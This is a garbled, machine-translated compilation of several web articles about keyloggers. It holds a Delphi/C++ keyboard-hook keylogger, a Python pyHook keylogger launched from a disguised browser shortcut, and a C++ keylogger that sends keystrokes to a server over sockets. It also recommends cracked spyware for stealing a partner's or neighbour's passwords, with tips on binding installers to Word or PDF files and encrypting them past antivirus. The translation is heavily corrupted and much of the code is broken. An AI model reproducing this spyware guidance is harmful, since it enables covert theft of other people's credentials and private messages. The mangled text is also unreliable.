Pokrokove escrevendo um keylogger na p.



Laboratório de segurança da informação. Yak tse zrobleno

Golovna / Otimização do trabalho

Sobre como escrever atalhos de teclado
rozpovidalos já mais de uma vez, mas todo o fedor
pensar em um grande nedollik - como regra,
Eu preciso saber mais
informações e não gravar tudo no arquivo de log,
o que koristuvach escrever no teclado - dificilmente chi você
pense muito
pressionando os botões ao jogar no CS 😉

Soa gritando que o espião pode ser saque
vamos colocá-lo, e não escrever estupidamente no feixe tudo o que
dar a você 🙂 Navit nomeie tal programa
a arma espiã não vira a língua - tse mayzhe
agente eletrônico 007 :-))) Shlyakhiv para
então o programa escreveu no log o que clicar
temos muito material. O mais simples -
controlar janelas ativas, tobto. em yaki
no momento pressione os botões 🙂 Yak tee,
Eu acho, você sabe, shpiguns, como regra, somam
arquivo com ícone que DLL. Tse pov'yazano z tim,
scho para a transição
é necessário criar um novo PROCESSO, e
zruchne para isso - vikoristovuvati dll-ku.
Para isso, para ativar
bem o próprio logger, você precisará usá-lo
o momento de pegar a DLL, e se ela estiver ativa
mudar para outra coisa - memória vivantage її z.

Vamos dar uma olhada nas funções DLL do meu Visual
C++. O desafio para o enigma sobre dlls é realizado
function hINSTAGE=LoadLibrary("name.dll"), de hINSTAGE -
yak bi descritor zavantazhenoї na memória DLL,
name.dll é o nome da biblioteca. Shchob її vivantage,
a função principal da FreeLibrary (hINSTAGE);

Agora sobre aqueles, como podemos precisar
programas. Por exemplo, sabemos que koristuvach
leia o e-mail através do site www.mail.ru, então você pode
pregue o agente de tal maneira que você conquiste
ataque de chaves, se o coristuvach entrar no cey
local na rede Internet. (Siga a memória, o que no passado
teclado dodatakh spigun vzagali não
talvez pratsyuvati, por exemplo, na linha de endereço
Internet Explorer "a - ce para trazer para "emergência
conclusão do programa" - o que mais você vê
Windows hot_v :))) Para qual método como um todo
pidide e ler senhas do discador
- como um koristuvach sofre de paranóia e escrúpulos
entre no login e passe manualmente 🙂 Ou então
cіkavo dіznatisya scho vіn escrever no Outlook ou
no bloco de notas. Eixo de parte do código que viconu
substituição dos títulos dos vicons que precisamos.

HINSTAGE HINSTAGE;

enquanto(1)
{
//Inicia o loop.

int sl,ll;
ll=1;
sl=2;
//Mudar para
lichinik
uma.
gráfico;
HWND hw;
//Demo é simples
shlyakhom - linhas aleatórias caractere por caractere:
tire o título do show e vamos precisar dele para nós
lado a lado.

enquanto (ll != sl)
{

hw=GetForegroundWindow();
GetWindowText(hw,st,128); // legível

char stt="_Aqui escrevemos o cabeçalho do
nós vіkna_№1";

sl=strlen(st);
ll=0;
enquanto (stt==st)
// igual
linhas caractere por caractere
//é melhor trabalhar nessas posições, qual será
para virar, o que é necessário para entrar
// Estamos em uma linha como uma parte na próxima linha, você pode
zrobiti como //filtro largo.

{
ll++;
}

if (ll==sl) ( //como linhas
correr até o final da 1ª linha -

parar; //interrompe o processo
}
// e até agora - como
É necessário reverter a aparência de vários vicons.

char stt="_Aqui escrevemos o cabeçalho do
nós vіkna_№2";
sl=strlen(st);
ll=0;
enquanto (stt==st)
{
ll++;
}

if (ll==sl) (
parar; //interrompe o processo
}

Você pode substituir a revisão subsequente
mantenha paralelo, se você alinhar em
um ciclo de elementos em uma linha, mesmo que apenas um
zbіglasya - então o DLL-spygun é ativado.

hINSTAGE=LoadLibrary("key1.dll");

Agora precisamos reescrever a hora inteira,
chi está sempre ativo.

enquanto (ll==sl) //docs
linhas zbіgayutsya - girando em mіstsі

{
hw=GetForegroundWindow();
GetWindowText(hw,st,128);
// legível
mais ativo de uma só vez.

ll=0;
enquanto (stt==st)
{
ll++;
}
}

Sair do ciclo para falar de quem é ativo
mudou de repente, que recebeu uma "arma espiã" vivantazhuemo
a biblioteca e o ciclo começa a partir da espiga - tobto.
o programa irá verificar novamente se o vipade está sozinho
você precisa de viçons.

FreeLibrary(hINSTAGE);

No entanto, as descrições acima do método podem
nedolіki - é necessário reconsiderar
de toda a lista de vikon chi є precisa
ativo no momento. Tom
você pode usar outro algoritmo - não substitua
o título do show, mas maravilha, como se no dado
visualizar elementos do tipo EditBox "a. Como regra,
senhas são escritas por você mesmo lá 🙂 Para quem vai
maravilhe-se com o elemento do vikna - e yakscho
entre eles є Edit - assim como uma DLL.

caractere p2, p3; //masivi
símbolos para os títulos das janelas.

Eu sei o mesmo no ciclo, reverificando todos os vikna:

while(p3 !="Editar") //docs
não sabia sobre o editbox - ciclo vikonuemo

{

hw=GetForegroundWindow();

HWND hwnd_filho; // mudança
elemento vikna

hwnd_child = GetWindow(hw,GW_CHILD);
GetClassName(hwnd_child, p3, 128);
if (p3!="Editar")
// como o primeiro
elementos conhecidos na janela - não EditBox - mesmo
brincadeira longe

{
while(hwnd_child != 0)
{
hwnd_child = GetWindow(hwnd_child, GW_HWNDNEXT);

GetClassName(hwnd_child, p3, 128);
if (p3=="Editar")
{
parar;
}
}
}
}

Agora vlasne sobre DLL shpigunsku.
Escreva її mais lindamente em Delphi, bo cey
O preenchimento masculino de Pascal não pode
Sons de "Sipishnoy"
prichipki aos tipos de dados. Shchob criar
selecione a biblioteca File-New-Direct Link - i
preparação para DLL está pronta. E o próprio eixo é o código:

chave de biblioteca1;
usa o Windows;

var
KHook: HHOOK; //Mudar para
"massa"

função KProc(Código: inteiro; wParam: Palavra; lParam: LongInt): LongInt; stdcall;
const
KState: inteiro = 1073741824; //o código
"Tecla pressionada"

var
Simv: ShortString;
KL: matriz de Char; //por
revisões de layout de teclado

Fstruct: TOFSTRUCT;
F: TextFile;
// mudança
arquivo de log.

começar

// Conecte-se
lembrete
if (lParam e KState)<>0 então
começar

saída;
fim;

AssignFile(F, "keylog.txt");

// vamos fazer um vodcrity
arquivo "keylog.txt":
if OpenFile(PChar("keylog.txt"), FStruct, OF_EXIST) = HFILE_ERROR então
começar
Reescrever(F);
// qual arquivo não é
criado - nós criamos.

fim
else Append(F);
//yakscho є - escreve em
fim.

Simv:=chr(0); // anulável
Altere o caractere que é lido no teclado.

// analisando o código
tecla pressionada
caso wParam de
// números
48..57: Simv :=Chr(wParam);
96: Simv:="0";
97: Simv:="1";
...
104:simv:="8";
105: Simv:="9";
189.109: Simv:="-";
110: Simv:=".";
111: Simv:="/";
fim;

GetKeyboardLayoutName(KL); //
revisando o layout

yaksho KL = "00000409" então //yakscho
Latim:

começar
caso wParam de
219: Simv:="[";
221: Simv:="]";
186: Simv:=";";
222: Simv:=""";
188: Simv:=",";
190: Simv:=".";
191: Simv:="/";
65..90: Simv :=Chr(wParam);
fim;
fim;
fim;
yaksho KL = "00000419" então
//yakscho
russo

começar
caso wParam de
219: Simv:="X";
221: Simv:="b";
186: Simv: = "F";
222: Simv:="E";
188: Simv:="B";
190: Simv: = "Yu";
191: Simv:=".";
65: Simv:="F";
...
87: Simv:="C";
88: Simv:="H";
89: Simv:="H";
90: Simv: = "eu";
fim;

// Este caractere não está vazio (so.
à medida que uma tecla alfanumérica é pressionada)
// Então escrevemos o arquivo yoga
se Simv<>"" então
Write(F, Simv);
//fecha o arquivo
FecharArquivo(F);

//envia notificação
outros pastkas no sistema
Resultado:=CallNextHookEx(KHook, código, wParam, lParam);
fim;

começar
//Inserir colar
para referência, vamos falar sobre o teclado.

KHook:=SetWindowsHookEx(WH_KEYBOARD, @KProc, HInstance, 0);

Você também pode perguntar a este programa em
pousio na esfera de zastosuvannya - yakscho
admissível precisa apenas rahuvati uma vez
senha do discador - você pode definir o mesmo
perevirku em vіkna para as nossas necessidades, e se não for
tornar-se ativo - assumir a biblioteca
key1.dll, obtenha a primeira hora, para
yak koristuvach vstigne preencher símbolos de qi em
teclado, e então vivantage a biblioteca
encerrar o programa. Mais ou menos 🙂

hINSTAGE=LoadLibrary("key1.dll");
dormir(10000);
// Chekati 10 segundos, por tse
Hora koristuvach discar a senha.
//a hora pode ser mais de pousio
tipo de estágio de galvanização do coristuvach
// aquela velocidade de yoga no teclado 🙂

FreeLibrary(hINSTAGE);

PS: Todos os materiais de recapeamento são fornecidos
incluindo demonstrações
objetivos iluminadores sagrados, o autor estabelecendo
demonstrando na sua frente
algoritmos de programas robóticos tipo "atualizações
teclado spigun" e tudo
prêmio por vencer
material cair sobre você (esmagadora
puller 🙂) O código de implementação tem
outras imprecisões
algoritmo - tente conhecê-lo você mesmo)).

PSS: Obviamente, um keylogger pode não ser
derrotar sua função principal -
é melhor escrever no log do ataque de botões, ale th
altere o valor das teclas pressionadas para o seu
relish - ale yak tse robiti i for what
talvez apenas a vida seja necessária -
hora que vem 🙂

Olá, estou te chamando de QUAZAR. Hoje vou mostrar como criar um keylogger simples em Python. Zrozumіlo, tsey keyboard spygun não pode balançar com gigantes assim, mas sem levar em conta tudo o que você pode conhecer seu zastosuvannya.

O que é um keylogger?

Relatando sobre aqueles que tal keylogger e sobre como ver keyloggers, você pode ler no artigo "". Para encontrar materiais adicionais sobre o tema, faça uma busca no site, que se encontra no canto superior direito. Basta digitar a palavra keylogger ou teclado pusher.

Keylogger simples em Python

Para criar um keylogger, precisamos:

  • Sistema Operacional: Windows ou MacOs
  • Instalações em uma máquina Python inteira, bem como bibliotecas especiais.

Este material é informativo por natureza. Vikladena na informação estatística é dada exclusivamente com um método baseado em conhecimento. Nem a redação do site www.site, nem o autor da publicação assumem qualquer responsabilidade por qualquer erro, o cabeçalho do artigo é o autor do artigo.

Criando um keylogger simples em Python

Para começar, você precisa instalar o Python.


Keylogger simples em Python

Depois de instalar o Python, você precisa instalar os módulos "pyHook" e "pywin32". Neste site você encontrará versões de 32 bits e 64 bits para Windows e outros sistemas operacionais. Atualize o PYhook e o pyWin32 para a versão do Python e do Windows que você instalou (32 bits ou 64 bits).


Keylogger em Python. Módulo PYhook Keylogger em Python. módulo pyWin32

Quando você quiser instalá-lo, abra o menu IDLE (Python GUI) no menu Iniciar.

Keylogger simples em Python

Vá para o menu "Arquivo" e clique no item "Novo arquivo". Em seguida, cole o código do keylogger:

#Nome: QUAZAR
#site: www.site
importar pyHook, pythoncom, sys, log
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(evento):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(evento.ascii)
logging.log(10,chr(evento.ascii))
retornar Verdadeiro
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown=OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

Economize algum dinheiro nomeando o arquivo Keylogger.pyw. Só não salve o arquivo do diretório raiz C: para copiar esse arquivo, você precisa de direitos de administrador. Crie uma nova pasta na unidade C: caso contrário, em outro local, você não precisa de direitos de administrador para copiar arquivos e salvar o Keylogger.pyw lá.

Como um arquivo de saída chamado “file_log =" C: keyloggerlog.txt ” você pode escolher se é um lugar, ou melhor, é melhor, se estiver conectado a um disco rígido. De qual aplicativo salvarei o arquivo zvіtu em disco no diretório raiz C:. Aje me não há nada para pegar.

Lançamento automático de um keylogger em Python

Keylogger está pronto. Agora você precisa trabalhar de forma que o keylogger seja iniciado automaticamente nas configurações do Windows. Você pode implementá-lo de forma diferente. Vamos tentar o zrobiti para obter ajuda no arquivo bat, vinculando o lançamento do keylogger a qualquer programa ou registrando-o na entrada automática.

Vou criar um arquivo bat. Copie e cole o seguinte código no bloco de notas:

::Nome: QUAZAR
::Site: www.site
@echo off
start "" "C:keyloggerkeylogger.pyw"
start "" "C:Arquivos de ProgramasOperalauncher.exe"

Na primeira linha, você precisa inserir um caminho para o arquivo keylogger.pyw (no meu caso "C: keylogger.pyw"). Em outra linha, você é responsável por inserir o caminho para o programa, então chame vikoristova koristuvach (na minha opinião - o navegador Opera).

Após a edição, salve o arquivo na extensão .bat (no meu login logger.bat) em algum local anexo no computador (no meu login em "C:keylogger.bat").

Agora vamos para o estilo de trabalho e escolha um atalho para um programa usado com frequência (meu navegador é o Opera). Clicamos com o botão direito do mouse no urso e clicamos no menu de contexto e vamos para a autoridade do atalho. No campo Objeto, insira o caminho para o arquivo bat do keylogger C:keyloggerlogger.bat.

Após a alteração, o ícone de atalho também será alterado. Alice é fácil de culpar pelos contribuintes para o poder (maravilhe-se com a tela).

Quem entre nós não quer se considerar pelo menos uma vez um hacker legal e zlamati bunda? :) Se você quer saber e não, então sobre esses, se seria bom tirar a senha do post/social. merezhi amigo, esquadrão / pessoa, susіda em kіmnati pensando que quero uma vez couro. :) Isso precisa corrigi-lo, zreshtoyu! Muitos ataques (ataques maliciosos) envolvem a infecção do computador da vítima com os chamados keyloggers (spyware).

Mais tarde, no artigo de hoje, falaremos sobre aqueles que são programas bezkoshtovnі para estudar em computadores baseados em windows, de mozhna zavantazhity їх novas versões, como infectar o computador da vítima com eles, e por que a particularidade de sua variante.

Ale, de costas, há pouco congestionamento.

Para que você precisa de keyloggers?

Sobre aqueles que são assim, eu acho, você mesmo adivinhou. Como regra, o fedor é como um programa, como se estivesse anexado (se você não quiser fazer isso) para ser instalado no computador da vítima, após o que ele corrige absolutamente tudo no teclado deste nó. Com este crime em si, de acordo com sua própria pressão, soará fixo: a data-hora do ataque (dії) naquele programa, caso em que você irá vikonanі (navegador, incluindo o endereço do site (hooray, vіrazu bachimo, senhas vіd chogo!); adendos locais; serviços systemnі (incluindo senhas de login do Windows, etc.).

Você pode ver claramente um dos problemas: levei alguns minutos para acessar o computador do meu suidka e quero pegar a senha do VK! Instalando o programa milagroso e ligando o computador. Como posso ver as senhas? Sabe como tirar o computador dela? Є novidade aceita: como regra, nі. A maioria dos keyloggers agora tem mais probabilidade de salvar toda a base acumulada do local, e ainda de selá-la mais longe. As opções para gerenciar os logs são essencialmente anônimas:

  • E-mail fixo (possivelmente kilka) - a melhor opção;
  • Servidor FTP (que tem VIN є);
  • Servidor SMB
  • Uma unidade flash é consertada (insira-a na porta USB do computador da vítima e todos os logs são copiados para lá automaticamente no modo invisível!).

Tudo é necessário? Acho que o ponto é óbvio. Um crime de roubo banal de senhas, fraudes de keyloggers e vários discursos de recepção:

  • Listagem de registro nas tarefas do social. mensageiros merezhakh chi (por exemplo, Skype).
  • Captura de tela.
  • Pereyad / captura de dados da webcam (o que pode ser mais difícil).

Como hackear keyloggery?

E a comida não é fácil. É preciso entender que não basta apenas conhecer um bom keylogger funcional.

Otzhe, o que é necessário para um spyware robótico bem-sucedido:

  • Acesso de administrador ao computador remoto.
    Além disso, não é obov'yazkovo o próprio acesso físico. Você pode fazer login através do RDP (Remote Desktop Service); visualizador de equipe; AmmyAdmin etc.
    Como regra, deste ponto de vista, os lugares mais dobrados são amarrados. No entanto, recentemente escrevi um artigo sobre como obter direitos de administrador no Windows.
  • E-mail/ftp anônimo (não cobramos por isso).
    Obviamente, porque você está lendo o Susidov Shura, você pode omitir este parágrafo com ousadia. Assim como você tem um vipadku, como você tem o computador da vítima em mãos (alya, descubra as senhas de um irmão/irmã).
  • Vidsutnіst trabalhando antivírus / sistemas internos para proteger o Windows.
    Mais keyloggers públicos (veja abaixo) e software antivírus mais importante (se os registradores de vírus devem entrar no kernel do sistema operacional ou no driver do sistema, e os antivírus não podem mais detectá-los, eles não podem destruí-los , eles não podem). Em virtude do exposto, o software antivírus, bem como o mesmo, será impiedosamente destruído. OK, antivírus, não é seguro que nosso spyware se torne o mesmo sistema que o Windows Defender (eles apareceram anteriormente no Windows 7 e posteriores). O fedor suspeita da atividade do trabalhador no computador. Você pode descobrir facilmente sobre aqueles que querem saber sobre eles no Google.

Axis, talvez, e todas as coisas necessárias, pense em seu sucesso em roubar senhas / folhetos / fotos de outras pessoas do que mais você pode ser tentado a invadir.

Como você pode baixar spyware e de їx?

Mais tarde, depois de dar uma olhada nos principais keyloggers, tive a chance de ganhar na minha prática diária com a ajuda de downloads gratuitos de suas versões mais recentes (então todas as versões ficam por enquanto (para quem realmente conhece os rostos) e já por testadores e vikiers).

0. O Rato!

Classificações (de 10):

  • Anexo: 10
  • Eficiência / Usabilidade: 9
  • Funcionalidade: 8

Tse é apenas uma bomba, não um keylogger! Na estação de trabalho, sente-se 15-20 KB. Por que se admirar: por causa da maioria da escrita em assembler (programadores veteranos choraram) e da escrita do grande por entusiastas de hackers;

Além disso, o pacote inclui FileConnector - um miniprograma que permite colar o keylogger com qualquer programa. Como resultado, você aceitará um novo arquivo exe praticamente do mesmo tamanho e, ao iniciá-lo, funcionará como aquele programa, com o qual você o colou! Após o primeiro lançamento, seu keylogger será automaticamente configurado para o modo invisível por trás dos parâmetros que você definiu para impor os logs. Útil, não é?

Grande oportunidade para engenharia social (traga a um amigo um arquivo-jogo/apresentação em uma unidade flash, você pode simplesmente digitar um documento do Word (sobre como criar um exe-ik que inicie um arquivo específico do word/excel em um de seus próximos artigos ), lançamento , tudo é bom e bonito, mas um amigo já está invisivelmente infectado!). Caso contrário, basta enviar este arquivo para um amigo por correio (melhor do que enviá-lo para baixá-lo, para que os servidores de e-mail possam baixar e gerenciar os arquivos exe). Obviamente, existe o risco de antivírus durante a instalação, mas ainda pode ser necessário (então não será após a instalação).

A propósito, para a ajuda de alguns outros dispositivos, você pode colar qualquer kit de distribuição da instalação anexada (como no The Rat! e no keylogger Elite) não apenas com arquivos exe (como no caso de alguns trochs de coristuvachs perplexos, mesmo assim, eles chamam suspeitas), ale і com grande palavra / Excel e arquivos pdf! Já em um simples pdf-ku, você não consegue pensar em nada, mas não está lá! :) Como ter medo é o tema de um artigo inteiro. Especialmente zavzyatі pode me escrever nutrição através da forma de um link de retorno. ;)

Zagalom, O Rato! você pode descrevê-lo por muito tempo e muito. Kudi é melhor para mim, o eixo é esmagado. Há um pedido para download.

1. Keylogger de elite

Classificações (de 10):

  • Anexo: 10
  • Eficiência / Usabilidade: 9
  • Funcionalidade: 8

Mabut, um dos melhores keyloggers já criados. Até 20 possibilidades, além do conjunto padrão (sobrepondo todos os add-ons/vicons/sites), incluindo overshooting de mensageiros, fotos da webcam e também - o que é mais importante! - Alterar senhas do serviço WinLogon. Em outras palavras, você pode alterar as senhas para fazer login no Windows (incluindo nomes de domínio!). Tornou-se possível lançar robôs no nível do driver do sistema e lançar no estágio de avanço do sistema operacional. Por uma questão de particularidade, este programa é completamente invisível para Kaspersky e para outros softwares anti-scrambler. Eu sei, eu não criei um keylogger personalizado construído em um táxi.

Bem, o prote não é varto silenciar sobre ele já fortemente. O próprio instalador é reconhecido pelos antivírus com ainda mais facilidade e para sua instalação você precisa de direitos administrativos e habilitar todos os serviços e serviços antivírus. Uma vez instalado, tudo ficará perfeito para qualquer ocasião.

Além disso, um recurso especial (um robô baseado no kernel do sistema operacional) é descrito para dar suporte à versão do sistema operacional, em quais keyloggers ele funcionará. A versão 5-5.3 (alimentada para passar o mouse abaixo) oferece suporte a tudo, inclusive o Windows 7. O Windows 8/10, assim como o Windows da família de servidores (2003/2008/2012) não são mais suportados. Є versão 6, que funciona milagrosamente, incl. na vitória 8 e 10, é impossível saber a versão crackeada no momento. Mabut, o futuro vai aparecer. Enquanto isso, você pode baixar o Elite keylogger 5.3 para mais.

Não existe um modo de trabalho de enquadramento, que não é para os robôs (para trabalhar duro nos computadores de seus spivrobitniks) ou todo o grupo de pessoas.

Um ponto importante é a possibilidade de criar um kit de distribuição instalado com personalizações (por exemplo, de um determinado endereço, correio, onde você precisa adicionar energia aos logs). Ao sair, você removerá o kit de distribuição, que na inicialização não vê nenhum avanço ou vicons futuros, e após a instalação você mesmo poderá construí-lo (o que significa que a opção é diferente).

Uma cópia das capturas de tela da 5ª versão (para mostrar que tudo é bonito e prático nos patins):

2. Keylogger completo.

Classificações (de 10):

  • Anexo: 3
  • Eficiência / Usabilidade: 9
  • Funcionalidade: 8

Também é uma coisa complicada. Funcionalidade como um todo no keylogger Elite. Axis zі skritnіstyu girsche correto. As senhas do Winlogon não são mais interceptadas, o driver win não é є, elas não são forçadas no kernel. No entanto, ele é instalado no sistema e nos anexos do diretório AppData, que não são tão fáceis de serem alcançados por drivers de terceiros (não em nome dessas instalações). Prote antivírus precoce chino com sucesso para roubar, então para roubar qiu rico não é necessário nadіynoy i bezpechnoy em vikoristanny, por exemplo, você tem que trabalhar para stezhennya para o poder das autoridades. ;) Cole outra coisa, ou criptografe o código para anexá-lo aos antivírus, não vá.

Pratsyuє em qualquer versão do OS Win (o que é prático).

Seja como for, tudo é maravilhoso: registre tudo (criando senhas para entrar no Windows), transferindo para todos os lugares (incluindo e-mail, ftp, pen drive fixo). Para zruchnist então tudo é milagroso.

3. Spytech SpyAgent.

Classificações (de 10):

  • Anexo: 4
  • Eficiência / usabilidade: 8
  • Funcionalidade: 10

Keylogger tão desonesto, mesmo que seja enigmático. Também é possível suportar versões de SO. A funcionalidade é semelhante às opções anteriores. Іsnuє tsіkava função de autodestruição após um determinado período de tempo (ou após atingir uma data predeterminada).

Além disso, é possível gravar vídeo de uma webcam e som de um microfone, que também pode ser solicitado e que não está disponível nos dois representantes anteriores.

Є modo robótico, que é útil para acompanhar toda uma rede de computadores. Vin, antes do discurso, є no StaffCop (antes de olhar ao redor, não inclusões na margem para um coristuvach - indivíduo físico). Talvez, este programa é ideal para robôs manter o controle de seu spivrobitnik (quer o líder neste campo sem guarda StaffCop e LanAgent - por exemplo, Vi - jur. Pessoa, obov'yazkovo para se maravilhar com eles). Mas, para seguir seus filhos, você adora sentar e olhar sites para adultos. Tobto. lá, é mais necessário não ser anexado, mas ser mais eficiente (incluindo um monte de revistas bonitas-zvіtіv apenas) que a funcionalidade de bloquear as tarefas de sites/programas (SpyAgent tem a mesma).

4. Monitor pessoal Spyrix.

Classificações (de 10):

  • Anexo: 4
  • Eficiência / usabilidade: 6
  • Funcionalidade: 10

Funcional à altura do candidato anterior, porém, há problemas de integridade. Além disso, a funcionalidade inclui um rico cicava: copiar arquivos de portadores USB que são inseridos no computador, bem como revisar remotamente os logs através de uma conta web no site da Spyrix).

5. Monitor pessoal Spyrix.

Classificações (de 10):

  • Anexo: 3
  • Eficiência / usabilidade: 6
  • Funcionalidade: 8

O relatório não é descritível, tk. Esta cópia do keylogger não pode fazer nada que não esteja em um dos spigers frontais, no entanto, alguns dos keyloggers podem cair na alma (pelo menos, com sua própria interface).

O que o resultado pode ter?

A fonte de alimentação do keylogger é mais ética, menos técnica e mais explorada para seus propósitos.

Da mesma forma, você é um fornecedor de robôs, que precisa controlar seu spivrobitnikiv, colocar ousadamente o StaffCop, pegar suas cartas spivrobitnikiv e permitir tais ações (e, além disso, para tal trabalho, eles podem te pegar muito bem) e logo no A capa. Quero conhecer maneiras especiais e eficazes de melhorar a prática dos meus spivrobitniks.

Se você é um TI-fahivets-pochatkіvets, que você acabou de testar, se não - você é um tolo - e se você trabalha no direito, use os métodos de engenharia social e realize testes em seus amigos, vikoristovuyuchi indução be-yaky z. No entanto, lembre-se: a manifestação de tal atividade pelas vítimas não faz nem amizade e longevidade. ;) Eu definitivamente não varto verificar no seu robô. Lembre-se das minhas palavras: eu consegui. ;)

Bem, sua meta é correr atrás de uma namorada, uma pessoa, um juiz, ou talvez, você trabalha duro regularmente e por um centavo, pense bem, chi varto. Adzhe precoce chi pizno pode obtê-lo. Aquele não é assim: "correndo para a brancura errante de outra pessoa - não está feliz com as recepcionistas". Se você ainda precisa (ou talvez trabalha na área de investigação de trapaças de computador e assim pode entrar em seus sapatos profissionais), existem apenas duas opções: The Rat! e Elite Keylogger. No modo de fixação de kits de distribuição de instalação colados em word/excel/pdf. Em suma, na medida do possível, criptografando com um novo cryptor. Somente em cada momento você pode garantir uma atividade mais ou menos segura e um sucesso real.

Mas, em qualquer caso, lembre-se de que é melhor usar keyloggers com mais competência - apenas um pequeno lanka ao alcance do objetivo (incluindo o lançamento de ataques simples). Não obtenha direitos administrativos, não obtenha acesso físico e nem todos os koristuvachs serão abertos, leia e baixe mais do seu anexo / solicitação (engenharia social privada), não comece a ativar o antivírus / seu keylogger / cryptor de qualquer maneira . Todos esses e muitos outros problemas podem ser superados, mas o outro é tema de toda uma série de outros artigos.

Em uma palavra, as Testemunhas começaram a porinati em um mundo dobrável, inseguro e ainda mais cicavi de segurança informacional. :)

Com respeito,Lisyak O.S.


E primeiro, prossiga antes de ler - confira meu blog, onde publico os artigos do meu autor sobre programação, virologia e outros discursos
Artigo original

Todas as informações são fornecidas exclusivamente para seu conhecimento. Nem a administração, nem o autor se responsabilizam por qualquer possível dano, subjugado pelos materiais deste artigo.


Peredmova
Por cerca de um mês, tenho observado constantemente diferentes truques, alimentando alguns keyloggers. Muitos shukav, mas não podiam conhecer os feriados, ricamente shukav, mas não podiam conhecer os vendedores, etc.

Neste artigo, quero mostrar como é fácil escrever um keylogger com funcionalidades básicas. Base I zapoziv zvіdsi - * * , corrigindo bugs e adicionando suporte adicional para interação com WinSocket

Materiais
  • Atualização 4 da comunidade do Visual Studio 2015
  • Visual C++ 2015
Estrutura do programa
Para a espiga é necessário indicar como o keylogger é usado. Seja enviando logs para FTP/Mail, gravando em um soquete, editando um arquivo em um gate, gravando logs em um banco de dados.
I virishiv zupinitsya em soquetes. Por quê? Tse zruchno, apenas utilizável.
A escolha de Vykhodyachi, precisaremos adicionar 2 suplementos:

Servidor
  • Programa de console, para que você receba dados do cliente e os veja no console
Cliente
  • Vlasne, o próprio keylogger, que é a maneira de pressionar as teclas no servidor
Eu sei, talvez, do servidor.

Servidor
Criamos um programa de console C++ no Visual Studio.
Todo o código está no escritório. bunda MSDN - *Consulte o fórum para uma revisão. *
Não é necessário que substituamos atos significativos pelo novo.
Vamos anotar as mudanças constantes: o tamanho do buffer e a porta do servidor para a qual os logs são enviados

O código:

#define DEFAULT_BUFLEN 1024 //Buffer #define DEFAULT_PORT "1337" //Porta

Em vez de um one-time do/while, colocamos um loop infinito, que aceita os dados como cliente, os exibe no console, fecha o dia e para um novo:

O código:

Do (ClientSocket = accept(ListenSocket, NULL, NULL); //Aceitar conexão iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);//Ler o log if (iResult > 0) //O log não está vazio printf( "% s", recvbuf); //Exibe closesocket(ClientSocket);//Fecha a data memset(recvbuf, 0, sizeof recvbuf);//Restaura memória) while (true);

Compilando no Release, soltando no didik, verificando a porta que precisamos e iniciando

Cliente


Criamos um programa Win32 no Visual Studio.
Como eu já disse mais, o gancho do teclado e o obbnik me empurram, levando s *Consulte o fórum para uma revisão. *
Para apertar o parafuso no soquete, virei para *Consulte o fórum para uma revisão. *
Além disso, é importante alterar as alterações constantes: tamanho do buffer, ip deda/computador e porta

O código:

#define DEFAULT_BUFLEN 20000 #define SERVER_IP "127.0.0.1" #define SERVER_PORT "1337"

Tive a oportunidade de trabalhar com esses métodos e trabalhar globalmente, para que o código pudesse ser corrigido corretamente:

O código:

WSADATA wsaData; SOCKET ConnectSocket = INVALID_SOCKET; HHOOK _hook;KBDLLHOOKSTRUCT kbdStruct; charlastjanela; int Salvar(int pressionamento de tecla); // Pegando outro argumento

Criamos um método de forçar dados no servidor atrás da bunda, como um buv na espiga de um parágrafo. Dalі, em breve substitua a porta, ip e info que são passados ​​para os argumentos da função:

O código:

Void sendData(char*ip, char*port, char*data)

Para o método Save, é o mesmo - pegamos outro argumento e alteramos a entrada de log no arquivo para edição no servidor:

O código:

Chardata; sprintf(data, "\n\n", window_title, s); sendData(SERVER_IP, SERVER_PORT, dados);

Dali, seguindo o mesmo princípio, muda a direção do ataque de chaves de serviço. As letras de reforço podem ser feitas nesta ordem:

O código:

Charc; sprintf(c, "%c", key_stroke); sendData(SERVER_IP, SERVER_PORT, c);

Tudo o que está relacionado à visibilidade da janela no código é claro e você está pronto.

Podbag
Quando o keylogger é iniciado, ele trava nos processos e a pele é pressionada contra o teclado. É possível que alguns símbolos sejam exibidos incorretamente, por exemplo, ouvir, mas você pode corrigir tudo sozinho (mesmo que tudo estivesse perfeito, antes de mim na PM eu bati Jesus do vendedor errado de um keylogger privado).

Vários programas de espionagem são necessários nas mentes, se até um computador puder acessar muitas pessoas.

Em suas mentes, os coristuvachs podem querer saber, esses sites foram vistos no mesmo computador (por exemplo, crianças), chi não roubou cartões de crédito para ajudar a salvar senhas e assim por diante.

Nossa análise permitirá que você encontre a escolha ideal.

Características de escolha

O que é um spigun de teclado para sua puta? O programa Tse, como, estritamente aparentemente, não está diretamente ligado ao teclado.

Vaughn vstanovlyuєtsya sobre o enigma sobre o computador e dіє. Muitas vezes não há sinal de atividade no computador, caso contrário, está certo.

Tal programa é mediado em conjunto com o teclado, para que funcione com o programa em um PC, como se alterasse os sinais que chegam ao processador como resultado de apertar botões, texto entre si.

Este é direcionado para tal software na seleção das informações que são inseridas através do teclado.

Esses utilitários são de um tipo diferente - para a ajuda de alguns, você pode examinar todo o texto digitado no teclado, para a ajuda de outros - apenas o que é digitado no navegador ou em qualquer programa selecionado.

Os programas Deyakі dão a oportunidade de criar tais exibições, caso contrário - não.

Então eles fedem um por um após o nível de ocultação. Por exemplo, a atividade de alguns é óbvia, na mesa de trabalho há muito pouco yarlik. programas para controlar atividades, por exemplo, crianças.

Acompanhe a presença e a atividade de outras pessoas, não nos lembramos - o fedor é anexado e instalado para instalação no computador de outra pessoa, se o fato da instalação for necessário anexar a um coristuvach de terceiros.

Vrakhovuchi tal variedade, escolha o software mais adequado pode ser feito dobrável.

Neste material de submissões do TOP dos melhores programas, é possível ganhar por isso. Entre eles, é mais fácil escolher o que eu preciso.

Características técnicas

Para simplificar o processo de escolha do software, nas tabelas abaixo estão listadas as principais características relativas de todos os programas incluídos até o TOP.

nomeTipo de licençaTipo de informação a recolherFuncionalProjeto
SC-KeyLogSem custoTudoAmplaperdão
Keylogger prático WideStepGratuito/PagoTudoAmplaRepintura
Espião realPagoTudoDuje largoPadrão
EliteKeyloggerPagoTudoAmplaPadrão
O rato!Gratuito/PagoMenos, mais baixo na frenteAcabamento amploantiestético
SPYGOSem custoVersão de pousioVersão de pousioDesign padrão do Windows
